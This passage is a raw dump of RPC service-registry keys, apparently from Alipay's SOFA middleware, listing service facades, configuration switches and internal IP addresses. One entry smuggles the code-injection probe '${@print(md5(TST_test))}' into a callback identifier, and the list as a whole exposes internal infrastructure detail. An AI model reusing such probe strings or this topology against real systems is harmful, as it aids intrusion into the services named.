D#@#SOFA.DRM","com.alipay.instradeprod2.common.service.InformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.InstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mobilesp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstassetprod.common.service.facade.api.IaAssetRiskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FCDATAMERGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditPayableFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.query.OpsQueryService:1.0:hnbc_plus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.finpwm.FinpwmAutoInvestPlanManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateInstructionStatusPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.MetaPluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliQueryLogFacade:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.CompositeTransactionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.invoice.RecycleInvoiceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.compmng.service.facade.CompensationService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ETETESTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.StrategyElfReviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finskyeye#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finpwm.facade.productpkg.SmartAntPkgMgrFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:tr_datafactory_acts_test_null@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.85.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finriskmngcore.common.service.facade.api.EventScoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:amlmatrix_pbcBackTrackRuleProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:subscribeMessageCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenOperatorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.ChildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.rockcode.facade.TaskCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.accreditcore.common.service.facade.HastenStopFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recon.common.service.facade.fund.api.FinishDailyAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.bpservice.facade.customer.CustomerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.taskExecuteAlarmNumLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MPAASWEB#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.authMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphasec.compass.sanction.facade.SanctionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.133.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.data.LifeDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.client.account.extension.AccountCardFetcherComponent:1.0:insassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.DetailPageActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilechat.common.service.facade.api.ChatMessageV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.custinsight.common.service.facade.promote.CrowdImportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkisvplatform.common.service.facade.etencip.CouponParamFileBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.PublicCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:ssdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.facade.BusinessActivityRemoteManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.ktbdatacenter.protein.api.ProteinFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:budgetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.api.PaymentServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.FintradeInstSignContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.author.AuthorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcapplycore.common.service.facade.config.ConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ShortCodeBackgroundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.SuiteServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.247.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebpp.LifmngSignTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.workday.HkWorkDayCalculationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insppbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinteligentpromo.common.service.facade.api.IsvServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.multitenant.api.TenantUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.defininstchannel.common.service.facade.api.execute.InstChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.164.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.accrmcore.common.service.facade.CRMBusinessTypeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.revmng.common.service.facade.ProcessInTransitValidatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.LiquidLimitQueryWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.XPushProFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_uct_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zmyschecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.budgetcore.common.service.facade.api.BudgetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkisvplatform.common.service.facade.etencip.IsvInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.142.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acordercore.common.service.facade.resource.SyncInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_XY_TEST0724#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.mif.common.service.facade.MerchantProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kabaocore.service.spi.OpenCardInvokeService:1.0:pcreditbenefit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:smartscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.data.MiniAppDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue18#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.lisa.service.eworkcard.EntEmployeeOperatorLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.OrderLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.punishconfig.PunishConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:certifyweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PointProcessDrmResouce.switchs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-appfuse-scheduler-payflux#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:riskConsultExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.DeviceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.226.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.facade.BizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@frdspcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.infosec.content.service.facade.InfosecForInfostudioService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:computeExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.95.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.ipaybuserviceAuthTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.anteduprod.common.service.facade.api.EnrollConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.changecore.ChangeTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.open.OpenRoleContactPersonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.core.service.api.TransInfoCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.sendmsg.CensorSendOtherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.DimCfgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.plugin.HistoricalCommandService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainassetreg.facade.api.query.DcrgOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.stopScheduler,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:algoevaluator@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-30#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","aclinkelib@zqueueMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.mfinquotationprod.common.service.facade.api.MarketInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finsign.common.service.facade.base.service.FinsignConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishRecDrmImpl.recWishLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinstockprod.atomic.service.facade.precheck.PreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.asset.UserAssetManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eco.smdd.service.api.tinyapp4b.order.OrderStatusHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.decideNoChannelNoRetrySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.luckystar.LuckyStarMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.bossLiabilityProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openevent.facade.ExpressIsvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.AspConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.recruit.OnLineProblemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanprod.common.service.facade.service.product.JieBeiPlusProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.fintransSlaveTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcube.common.service.facade.page.CategoryPermissionIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FcStockManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.NotifyMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundRuleDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.YqCaseBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.PerformanceSwitcher.whiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.deleteUgc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoplaycenter.biz.shared.play.divide.service.DivideSummaryOrderRemoteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AcctransSystemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:compmng-compmngTestCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantWhitePageDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.spi.LoanCreditFacade:1.0:fscLoanCreditApplyNodeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.TriggerTestCaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.zdalProxySchemas,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradeapcore.service.api.TradeSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:yunfengdieweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.152.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.selectProductTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vega.keeper.client.sofa.KeeperSofaRuntimeContextService:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.HbaseOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:${@print(md5(TST_test))}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileprod.edu.facade.service.SchoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.140.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:forexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZQUALITYWALLEETOE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.vcontract.api.MvouchContractRecordLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtCommonConfigureManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.InsureEndorseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.downEventConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.yeb.manager.UserLoanAccountIncomeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.140.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSCLAIMDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.intclcn.common.service.facade.AcrdVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.MNotifyClientDAS:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.deliver.DeliverServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.PolicySupportServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.executeToCombineSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","acts.sofa.test.facade.TestOneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.core.config.drm.DrmAccLogDoubleWriteConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.186.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.framodel.core.service.facade.api.FramodelMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.adjustOpened,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.syncGlobalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pvsofabootserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.stepflow.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.UsageCardEventDrmResource.msgcompensateOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:couponcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.CompensationAttachService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcmerchantprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_RCCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dss.endpoint.plugin.openapi.CrawlerMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.server.fileBridgeQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.